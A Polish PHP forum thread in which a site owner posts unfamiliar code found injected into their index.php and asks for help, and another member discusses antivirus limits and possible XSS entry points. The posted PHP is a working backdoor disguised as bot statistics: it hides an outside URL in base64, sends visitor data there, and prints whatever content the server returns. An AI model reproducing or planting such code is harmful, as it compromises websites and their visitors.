Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Podejrzenie włamania na serwer, Proszę o szybką pomoc
Barcelona
post
Post #1





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----

Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

[PHP] pobierz, plaintext 
  1. <?php    
  2.  
  3.     // This code use for global bot statistic
  4.  
  5.     $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
  6.  
  7.     $stCurlHandle = NULL;
  8.  
  9.     $stCurlLink = "";
  10.  
  11.     if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
  12.  
  13.     {
  14.  
  15.         if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
  16.  
  17.         $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
  18.  
  19.             $stCurlHandle = curl_init( $stCurlLink ); 
  20.  
  21.     }
  22.  
  23.     } 
  24.  
  25. if ( $stCurlHandle !== NULL )
  26.  
  27. {
  28.  
  29.     curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  30.  
  31.     $sResult = @curl_exec($stCurlHandle); 
  32.  
  33.     if ($sResult[0]=="O") 
  34.  
  35.      {$sResult[0]=" ";
  36.  
  37.       echo $sResult; // Statistic code end
  38.  
  39.       }
  40.  
  41.     curl_close($stCurlHandle); 
  42.  
  43. }
  44.  
  45. ?>
[PHP] pobierz, plaintext


Co to jest? Proszę o pomoc.
Go to the top of the page
+Quote Post
 
 Start new topic
Odpowiedzi
by_ikar
post
Post #2





Grupa: Zarejestrowani
Postów: 1 798
Pomógł: 307
Dołączył: 13.05.2009
Skąd: Gubin/Wrocław

Ostrzeżenie: (0%)
-----

Kod
Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.


Wytłumacz mi jak antywirus znajdzie wirusa, na temat którego żadnych informacji nie ma? Może to być nawet rootkit który będzie dołączony do sterowników czy cokolwiek innego. Antywirus nie daje 100% zabezpieczenia nigdy i nigdy dawać nie będzie. Zrozumcie to w końcu..

Co do samej strony, sprawdź formularze, może są dziurawe w efekcie ktoś ci xss zrobił na stronie.
Go to the top of the page
+Quote Post

Posty w temacie
- Barcelona   Podejrzenie włamania na serwer   27.09.2011, 23:36:55
- - tabbi   Ktoś zbiera dane na temat twojej strony i wysyła ...   27.09.2011, 23:55:21
- - Barcelona   Tutaj zostaje wysłane, ale jakim cudem ten kod zna...   28.09.2011, 00:03:40
- - tabbi   Odpowiedzi na to pytanie może być wiele, zaczynaj...   28.09.2011, 00:57:51
- - Barcelona   Nikomu nie udostępniałem hasła, znam go tylko ja i...   28.09.2011, 01:43:53
- - Damonsson   Total Commander? ;>   28.09.2011, 01:46:10
- - Barcelona   Już dawno nie, WinSCP   28.09.2011, 02:02:17
- - konrados   CytatTotal Commander? A właściwie to o co chodzi ...   2.10.2011, 12:54:04
- - pienso   Jak będziesz wiedział to daj znać gdzie była luka ...   2.10.2011, 13:55:55
- - konrados   CytatJak będziesz wiedział to daj znać gdzie była ...   2.10.2011, 15:10:37
- - drozdii07   Jeśli zapamiętujesz hasło w TC, to później wirusy ...   2.10.2011, 15:14:52
- - konrados   CytatJeśli zapamiętujesz hasło w TC, to później wi...   2.10.2011, 15:19:40
|- - Fifi209   Cytat(konrados @ 2.10.2011, 16:19:40 ...   2.10.2011, 15:53:44
- - Korab   To może przeskanuj sobie komputer dwoma programami...   2.10.2011, 16:03:31
- - konrados   CytatPo pierwsze, nie musisz sobie ściągać wirusa ...   2.10.2011, 16:42:25
|- - 92nasti   Cytat(konrados @ 2.10.2011, 17:42:25 ...   2.10.2011, 17:41:38
- - konrados   CytatBłyszczysz wiedzą, w sumie to za chwile dojdz...   2.10.2011, 17:49:26
- - Barcelona   Uuuu troche mnie nie było i widzę że wątek nabrał ...   2.10.2011, 21:50:21
|- - mcsgroup   Cytat(Barcelona @ 2.10.2011, 22:50:21...   4.10.2011, 12:22:09
- - by_ikar   KodWracając do tematów TC i wirusów, to ja jestem ...   3.10.2011, 09:54:32
- - Barcelona   CytatWytłumacz mi jak antywirus znajdzie wirusa, n...   4.10.2011, 11:39:02
- - Barcelona   No i dziękuje za potwierdzenie mojej teorii Jest ...   6.10.2011, 14:44:10
- - gekoncaros   Witam nie jestes sam ja tez na serwerze linuxpl.co...   23.11.2011, 12:24:14
- - pioklo   Cytat(gekoncaros @ 23.11.2011, 13:24...   25.11.2011, 22:58:10

« Następny starszy · PHP · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 11.10.2025 - 16:39
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn